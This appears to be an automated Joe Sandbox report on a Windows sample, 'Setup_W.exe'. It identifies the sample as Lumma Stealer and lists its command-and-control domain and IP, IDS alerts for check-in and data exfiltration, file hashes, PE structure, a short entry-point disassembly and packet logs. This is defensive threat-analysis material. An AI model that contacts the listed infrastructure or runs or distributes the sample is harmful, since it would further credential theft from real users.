                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://mooncobudy.click/apiOBitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://mooncobudy.click/s):BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.44.57
                                                                                  mooncobudy.clickUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1580153
                                                                                  Start date and time:2024-12-24 02:55:08 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 10s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:5
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Setup_W.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 85%
                                                                                  • Number of executed functions: 9
                                                                                  • Number of non-executed functions: 75
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Stop behavior analysis, all processes terminated
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target BitLockerToGo.exe, PID 7680 because there are no executed function
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  20:56:35API Interceptor8x Sleep call for process: BitLockerToGo.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.44.57https://lnkd.in/egd84c_YGet hashmaliciousUnknownBrowse
                                                                                    https://lnkd.in/exwPeXjcGet hashmaliciousHTMLPhisherBrowse
                                                                                      https://lnkd.in/e4hHCn_zGet hashmaliciousHTMLPhisherBrowse
                                                                                        https://lnkd.in/e7UhDEpWGet hashmaliciousHTMLPhisherBrowse
                                                                                          No context
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUSiviewers.dllGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.195.241
                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.145.201
                                                                                          Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.199.72
                                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.48.1
                                                                                          AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.184.241
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.169.205
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 188.114.96.6
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 188.114.96.6
                                                                                          'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.169.205
                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.191.144
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          a0e9f5d64349fb13191bc781f81f42e1iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.44.57
                                                                                          AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.44.57
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\user\AppData\Local\Temp\glfw.4281411633.dllOD5lecPHBl.exeGet hashmaliciousLummaCBrowse
                                                                                            gFCeeWNTvZ.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                              Process:C:\Users\user\Desktop\Setup_W.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1133967
                                                                                              Entropy (8bit):6.2621593785107486
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:+a8Fde9YR/HHeL8ty/dqBHmShQqNHxhy4pDKP7BXUB:+NFbd9thHBQqNRhy4pDKtM
                                                                                              MD5:4EC2D5A48D44C814F6AD68011E83A32B
                                                                                              SHA1:881A6E610EF0B1DDD7BAE3C00A123C895E3DA570
                                                                                              SHA-256:93CE68219CB0E920A0B9F04A38BBEFF104F530A643FD0A792215572525869F90
                                                                                              SHA-512:FCA67E744FA535AE92C17AEF16DA3CA2FA58811DE0BACB97BA73E716DBDC62CAA1EE43D957E90C9FC93E6BC366EDACCD6D3FF60AE1182F1384BB0B4AE5DCCB07
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: OD5lecPHBl.exe, Detection: malicious, Browse
                                                                                              • Filename: gFCeeWNTvZ.exe, Detection: malicious, Browse
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........*..b......!...".....L...$...........0....`d................................=......... ......................`.......p..x...........................................................t&...................... s...............................text...$...........................`.P`.data........0......................@.`..rdata.......@.......$..............@.`@.bss.... "...0........................`..edata.......`......................@.0@.idata..x....p......."..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B/4...................R..............@.@B/19.....c............X..............@..B/31......p.......r...n..............@..B/45..... ...........................@..B/57......>.......@..................@.0B/70......Z.......\..................@..B/81.......... .......t..
                                                                                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                              Entropy (8bit):1.6920799782292244
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:Setup_W.exe
                                                                                              File size:32'077'826 bytes
                                                                                              MD5:bcb408aad4a09a615ecaab20c8016c3b
                                                                                              SHA1:5b6885e46d0ee42bc1ff8f3c503c95d72e7b2882
                                                                                              SHA256:d53658877443a27b1e4e5abfdf79717493343f21b824db045d5bfff67302465c
                                                                                              SHA512:15d60431e3af171aeafe66ea55bcee6e5fddb5a5bb62fd1a6c01166f867796aa72931ed2662086d72ab37a710f17c473c3613e753df63fef3ed585c6b5f9697e
                                                                                              SSDEEP:49152:lDw8IpmwyvpK9RGfEfMS+jNVlgy9K0PSSNDAmcSenM2VdRJmFzX5hDjEfx8kw6xE:ls8IpZP9RGfEk3NYSE6XizRcJoXK
                                                                                              TLSH:83674B90F9CB14F6DA031830146B627F27356D058B25CBCBFA1CBF69EB776A10936609
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........`Y..............p%..J.......H.......pL...@...........................\......|Y...@................................
                                                                                              Icon Hash:2d2e3797b32b2b99
                                                                                              Entrypoint:0x464880
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:1
                                                                                              File Version Major:6
                                                                                              File Version Minor:1
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:1
                                                                                              Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                                                                                              Instruction
                                                                                              jmp 00007F30D102B380h
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              mov ecx, dword ptr [esp+04h]
                                                                                              sub esp, 28h
                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                              mov dword ptr [esp+10h], ebp
                                                                                              mov dword ptr [esp+14h], esi
                                                                                              mov dword ptr [esp+18h], edi
                                                                                              mov esi, eax
                                                                                              mov edx, dword ptr fs:[00000014h]
                                                                                              cmp edx, 00000000h
                                                                                              jne 00007F30D102D6A9h
                                                                                              mov eax, 00000000h
                                                                                              jmp 00007F30D102D706h
                                                                                              mov edx, dword ptr [edx+00000000h]
                                                                                              cmp edx, 00000000h
                                                                                              jne 00007F30D102D6A7h
                                                                                              call 00007F30D102D799h
                                                                                              mov dword ptr [esp+20h], edx
                                                                                              mov dword ptr [esp+24h], esp
                                                                                              mov ebx, dword ptr [edx+18h]
                                                                                              mov ebx, dword ptr [ebx]
                                                                                              cmp edx, ebx
                                                                                              je 00007F30D102D6BAh
                                                                                              mov ebp, dword ptr fs:[00000014h]
                                                                                              mov dword ptr [ebp+00000000h], ebx
                                                                                              mov edi, dword ptr [ebx+1Ch]
                                                                                              sub edi, 28h
                                                                                              mov dword ptr [edi+24h], esp
                                                                                              mov esp, edi
                                                                                              mov ebx, dword ptr [ecx]
                                                                                              mov ecx, dword ptr [ecx+04h]
                                                                                              mov dword ptr [esp], ebx
                                                                                              mov dword ptr [esp+04h], ecx
                                                                                              mov dword ptr [esp+08h], edx
                                                                                              call esi
                                                                                              mov eax, dword ptr [esp+0Ch]
                                                                                              mov esp, dword ptr [esp+24h]
                                                                                              mov edx, dword ptr [esp+20h]
                                                                                              mov ebp, dword ptr fs:[00000014h]
                                                                                              mov dword ptr [ebp+00000000h], edx
                                                                                              mov edi, dword ptr [esp+18h]
                                                                                              mov esi, dword ptr [esp+14h]
                                                                                              mov ebp, dword ptr [esp+10h]
                                                                                              mov ebx, dword ptr [esp+1Ch]
                                                                                              add esp, 28h
                                                                                              retn 0004h
                                                                                              ret
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              mov ecx, dword ptr [esp+04h]
                                                                                              mov edx, dword ptr [ecx]
                                                                                              mov eax, esp
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5aa0000x3dc.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5ca0000x1569.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5ab0000x1d196.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x4c7ac00xa0.data
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x256f450x257000d278899f2c6422f4d7a6b52a5e0580acunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x2580000x26e1780x26e200bead5027654621eeb6cf85bfce10536funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x4c70000xe2e880xb34003a8397f699b886c54af33952f9d8f93aFalse0.823827852597629data7.541368107103972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .idata0x5aa0000x3dc0x400fb5b1331cefd67685dc75e5d1313908bFalse0.4892578125data4.658569854292025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .reloc0x5ab0000x1d1960x1d200f59ddc37c309ed2fd920e7c1d497e73aFalse0.592903366416309data6.654996174362885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              .symtab0x5c90000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x5ca0000x15690x1600ba22aa132f6a48ea7531938e212a0bfeFalse0.33238636363636365data4.333247400480422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x5ca18c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                              RT_ICON0x5ca2b40x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                              RT_ICON0x5ca81c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                              RT_ICON0x5cab040x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                              RT_GROUP_ICON0x5cb3ac0x3edataEnglishUnited States0.8387096774193549
                                                                                              RT_MANIFEST0x5cb3ec0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                              DLLImport
                                                                                              kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-24T02:56:35.575963+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.44.57443TCP
                                                                                              2024-12-24T02:56:36.609310+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736104.21.44.57443TCP
                                                                                              2024-12-24T02:56:36.609310+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.44.57443TCP
                                                                                              2024-12-24T02:56:37.836660+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.44.57443TCP
                                                                                              2024-12-24T02:56:38.875868+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737104.21.44.57443TCP
                                                                                              2024-12-24T02:56:38.875868+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.44.57443TCP
                                                                                              2024-12-24T02:56:40.466376+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.44.57443TCP
                                                                                              2024-12-24T02:56:43.149298+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.44.57443TCP
                                                                                              2024-12-24T02:56:44.090669+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449739104.21.44.57443TCP
                                                                                              2024-12-24T02:56:45.506207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.44.57443TCP
                                                                                              2024-12-24T02:56:48.609961+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.44.57443TCP
                                                                                              2024-12-24T02:56:51.052897+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.44.57443TCP
                                                                                              2024-12-24T02:56:51.065678+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449742104.21.44.57443TCP
                                                                                              2024-12-24T02:57:01.995879+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.44.57443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 24, 2024 02:56:34.354233980 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:34.354273081 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:34.354345083 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:34.358361006 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:34.358378887 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:35.575881958 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:35.575963020 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:35.797346115 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:35.797383070 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:35.797755957 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:35.839376926 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:35.853719950 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:35.853751898 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:35.853813887 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:36.609298944 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:36.609378099 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:36.609432936 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:36.612060070 CET49736443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:36.612078905 CET44349736104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:36.621550083 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:36.621576071 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:36.621648073 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:36.621957064 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:36.621968031 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:37.836580992 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:37.836659908 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:37.837939024 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:37.837948084 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:37.838181019 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:37.842956066 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:37.843002081 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:37.843034029 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.875871897 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.875910997 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.876029015 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:38.876041889 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.877089977 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.877118111 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.877137899 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:38.877145052 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.877192974 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:38.884169102 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.895956993 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.895987034 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.896001101 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:38.896009922 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.896055937 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:38.904350042 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:38.948770046 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:38.995635033 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.042504072 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.042511940 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.071626902 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.071652889 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.071686983 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.071691990 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.071732044 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.071737051 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.072012901 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.072153091 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.072166920 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.072176933 CET49737443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.072182894 CET44349737104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.252322912 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.252371073 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:39.252461910 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.252820015 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:39.252845049 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:40.466288090 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:40.466376066 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:40.467801094 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:40.467812061 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:40.468051910 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:40.469192028 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:40.469340086 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:40.469373941 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:40.469434023 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:40.469441891 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:41.850955963 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:41.851057053 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:41.851111889 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:41.851299047 CET49738443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:41.851315022 CET44349738104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:41.934942961 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:41.934973955 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:41.935030937 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:41.935379028 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:41.935390949 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:43.149226904 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:43.149297953 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:43.150490999 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:43.150500059 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:43.150698900 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:43.151786089 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:43.151935101 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:43.151962996 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:44.090620995 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:44.090706110 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:44.090755939 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:44.090946913 CET49739443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:44.090964079 CET44349739104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:44.286206007 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:44.286252022 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:44.286320925 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:44.286658049 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:44.286672115 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:45.506128073 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:45.506206989 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:45.507493973 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:45.507500887 CET44349740104.21.44.57192.168.2.4
